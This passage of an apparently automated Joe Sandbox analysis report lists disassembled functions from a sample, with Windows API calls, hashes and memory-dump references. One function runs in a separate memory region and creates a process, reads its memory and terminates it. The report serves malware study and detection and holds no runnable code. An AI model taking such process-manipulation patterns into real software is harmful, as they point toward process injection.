                                                                      • Opcode ID: eb28a8da3c5889590f1be3578eaef9a87ed51b5a888b34e14221683fc393202b
                                                                      • Instruction ID: 9e0916953299c518e46131bc2af9a08547f5a4da4f2c25750fc4e91c0369e7a3
                                                                      • Opcode Fuzzy Hash: eb28a8da3c5889590f1be3578eaef9a87ed51b5a888b34e14221683fc393202b
                                                                      • Instruction Fuzzy Hash: 9A511070A102479EDB209F65C8816BAFFE5EF41300F1881BFD19A8A361E6359942DBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDC9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BD2D74: GetLastError.KERNEL32(?,?,00BD5686,00BE3CD6,?,00000000,?,00BD5B6A,?,?,?,?,?,00BCE6D1,?,00C68A48), ref: 00BD2D78
                                                                        • Part of subcall function 00BD2D74: _free.LIBCMT ref: 00BD2DAB
                                                                        • Part of subcall function 00BD2D74: SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DEC
                                                                        • Part of subcall function 00BD2D74: _abort.LIBCMT ref: 00BD2DF2
                                                                        • Part of subcall function 00BDCADA: _abort.LIBCMT ref: 00BDCB0C
                                                                        • Part of subcall function 00BDCADA: _free.LIBCMT ref: 00BDCB40
                                                                        • Part of subcall function 00BDC74F: GetOEMCP.KERNEL32(00000000), ref: 00BDC77A
                                                                      • _free.LIBCMT ref: 00BDCA33
                                                                      • _free.LIBCMT ref: 00BDCA69
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorLast_abort
                                                                      • String ID:
                                                                      • API String ID: 2991157371-0
                                                                      • Opcode ID: 2525041da4492944343391d36753f5a107bc4cd0bdc47483b46e16a7be6acc73
                                                                      • Instruction ID: 3c2182767b87e57cc53311f0dfeec5e3272a809ac22bc2f84a3dc0356add0d84
                                                                      • Opcode Fuzzy Hash: 2525041da4492944343391d36753f5a107bc4cd0bdc47483b46e16a7be6acc73
                                                                      • Instruction Fuzzy Hash: 0531AF3190424AAFDB11EBA9D481BADFBE5EF40320F2101DBE8049B3A2FB759D41DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD2FD7 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(00000000,00BA1129,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000,00000364,?,00BD2E46,00000000), ref: 00BD3037
                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BD3044
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                      • String ID:
                                                                      • API String ID: 2279764990-0
                                                                      • Opcode ID: 8cb3a0646580fe20a3404e70feb335aec329272b7bc714430c7aa4b5ab01b8c9
                                                                      • Instruction ID: 963ee345e8aa5de489cd7c5446cdb1ace35cbdd1f58e07b70b7413edc8544d49
                                                                      • Opcode Fuzzy Hash: 8cb3a0646580fe20a3404e70feb335aec329272b7bc714430c7aa4b5ab01b8c9
                                                                      • Instruction Fuzzy Hash: 82113A33A001219B9B31DE59DC80B6EF3D5DB80B6071601A1FD16AB356E731DE0197D2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BA5773
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00BE4052
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 6fdfb26b1bc2292163461306a72657756f5b4a4387779270b20af95f100ff048
                                                                      • Instruction ID: bf1bfa340039808c59cde64d71eba973d2a55c605bf283d96eabdb58cccce3c2
                                                                      • Opcode Fuzzy Hash: 6fdfb26b1bc2292163461306a72657756f5b4a4387779270b20af95f100ff048
                                                                      • Instruction Fuzzy Hash: 80019230145225B6E7310A2ACC4EF9B7F98EF027B0F108350BA9C6A1E1CBB45954DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC3414 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BC3600: try_get_function.LIBVCRUNTIME ref: 00BC3615
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC3432
                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BC343D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                      • String ID:
                                                                      • API String ID: 806969131-0
                                                                      • Opcode ID: 0c8d5f75b46f88726a22c1af23f960b25181e8ca8dc1befe2ccd0993f8dfe1cb
                                                                      • Instruction ID: 17d87b6c5c0cb720182e0438f74e26a64d10cd20a1cdfa4d8c5b74871726cef0
                                                                      • Opcode Fuzzy Hash: 0c8d5f75b46f88726a22c1af23f960b25181e8ca8dc1befe2ccd0993f8dfe1cb
                                                                      • Instruction Fuzzy Hash: 15D0A93060C301A90C1D2AB438A3FA913C08841F793E0D2EEE820C93C2EB658301391A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BAB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00BABB4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: e49765f197c58437060dcd2cacadc815b83cbbba65aa483efe821f6b5e1db7f1
                                                                      • Instruction ID: 74c19c669a48111007ee22fb4f9ca87e4cb4d491bc380a68d5d3dc17fcdfd8b0
                                                                      • Opcode Fuzzy Hash: e49765f197c58437060dcd2cacadc815b83cbbba65aa483efe821f6b5e1db7f1
                                                                      • Instruction Fuzzy Hash: 4932AD34A082099FDB10DF54C894FBEB7F9EF46310F148099EA25AB262D774ED85CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001112FD Relevance: 1.9, APIs: 1, Instructions: 400processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,00000000), ref: 00111B2D
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00111B73
                                                                      • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00111E7C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateMemoryReadTerminate
                                                                      • String ID:
                                                                      • API String ID: 2831168122-0
                                                                      • Opcode ID: b327fbffe67f088a8ec06bc3364a8d9e1395271827ab643009cfd88a26bb8519
                                                                      • Instruction ID: b5f370da5cf87ca1dfbddf7dad2beb3468161fc58d65392719ffb8c1830ee061
                                                                      • Opcode Fuzzy Hash: b327fbffe67f088a8ec06bc3364a8d9e1395271827ab643009cfd88a26bb8519
                                                                      • Instruction Fuzzy Hash: 7F12CE24E24658C6EB24DF64D8507DEB232FF68300F1091E9910DEB7A5E77A4F81CB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA4E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4E9C
                                                                        • Part of subcall function 00BA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EAE
                                                                        • Part of subcall function 00BA4E90: FreeLibrary.KERNEL32(00000000,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EC0
                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EFD
                                                                        • Part of subcall function 00BA4E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4E62
                                                                        • Part of subcall function 00BA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E74
                                                                        • Part of subcall function 00BA4E59: FreeLibrary.KERNEL32(00000000,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E87
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      • Opcode ID: 9335f787675ea644e025526f3b651b90fbab8db183f0c7752fabe467f171b803
                                                                      • Instruction ID: 8e6407d895ed4c02fcbd2f57bb7480d1008f0a7fafd578079af00bfac09529d9
                                                                      • Opcode Fuzzy Hash: 9335f787675ea644e025526f3b651b90fbab8db183f0c7752fabe467f171b803
                                                                      • Instruction Fuzzy Hash: 46110132618205AACB24AB60DC42FED77E4AF81B10F2084ADF456B61C1EFB1EA049750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: 289625f387150c380de3b1124fda8b40cd4b4d0077313bfcb0522dba657b4a0c
                                                                      • Instruction ID: a6736b1b8189ca2027441526837aacce89d638ad8d93be51d880dbf9cb11cfb4
                                                                      • Opcode Fuzzy Hash: 289625f387150c380de3b1124fda8b40cd4b4d0077313bfcb0522dba657b4a0c
                                                                      • Instruction Fuzzy Hash: 5B11187590410AAFCB05DF58E941A9EBBF5EF48315F10409AF808AB312EB31EA11CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA9A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000), ref: 00BA9A9C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 53cd387e20cc0ad84c4ee7a0e768ad6c5db2a1a546e13cd2c4b2362cee6f5992
                                                                      • Instruction ID: 132e2352af4a6742c572d085a6bbd15dcd16b2205974e78199341ac7fa8ae82e
                                                                      • Opcode Fuzzy Hash: 53cd387e20cc0ad84c4ee7a0e768ad6c5db2a1a546e13cd2c4b2362cee6f5992
                                                                      • Instruction Fuzzy Hash: 7B114832208B059FD720CF15C880B66B7F9EF45764F10C46EE9AB8AA51C770F945EB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BD4C7D: RtlAllocateHeap.NTDLL(00000008,00BA1129,00000000,?,00BD2E29,00000001,00000364,?,?,?,00BCF2DE,00BD3863,00C71444,?,00BBFDF5,?), ref: 00BD4CBE
                                                                      • _free.LIBCMT ref: 00BD506C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                      • Instruction ID: 06897c56f09b379ec772387a3132fd9589e601086871614e9f68adb450282985
                                                                      • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                      • Instruction Fuzzy Hash: DF0126722047046BE3318F659881A5AFBECFB89370F25056EE18483380FA30A805C6B4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BCE469 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __alldvrm
                                                                      • String ID:
                                                                      • API String ID: 65215352-0
                                                                      • Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                                      • Instruction ID: d9ba2ffd78fd357dd42ca84b7c1766f858f7460c862b8ecd6eddf3bd2a2664d8
                                                                      • Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                                      • Instruction Fuzzy Hash: FA015E71910308EAEB289FA4CD46BAEB6E8EB40724F5185AEE416D7200D675DE00C765
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BCE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                                      • Instruction ID: 8fa45faa1acfc3a790a104d441f2be8ecb1f430999cbf6bab9cfffb3cfd8efc4
                                                                      • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                                      • Instruction Fuzzy Hash: 49F0D136521A10D6C6312A799C05F5A73DC9F62331F1007FEF431962D2EB74E80186A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,00BA1129,00000000,?,00BD2E29,00000001,00000364,?,?,?,00BCF2DE,00BD3863,00C71444,?,00BBFDF5,?), ref: 00BD4CBE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 37fa20e65d27263c0709b68f24d72001ae41873f2a567236bef65a9384bf6455
                                                                      • Instruction ID: 6d20ef04aba526be425b8ea9cd8f3fe9f09426a01c2ecb33a51ad2bf0f945f82
                                                                      • Opcode Fuzzy Hash: 37fa20e65d27263c0709b68f24d72001ae41873f2a567236bef65a9384bf6455
                                                                      • Instruction Fuzzy Hash: F1F0E231622224A7DB215F629C09F5FB7C9FF517A1B1D41EBFC19AA390EB70D80196E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 9c5f78b3427383a38971572370fc9e293e072ed864d10e9fe537db0d597398e6
                                                                      • Instruction ID: d19fa98aff6c437292b558cb8e5c1af4a9c25df0d1667f0b69002c638c3dbce3
                                                                      • Opcode Fuzzy Hash: 9c5f78b3427383a38971572370fc9e293e072ed864d10e9fe537db0d597398e6
                                                                      • Instruction Fuzzy Hash: 40E0E53120062596D72126669C00F9EBACAEB42FB0F0900E6BC0496692FB52DE01A3E2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD4D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BD4D9C
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
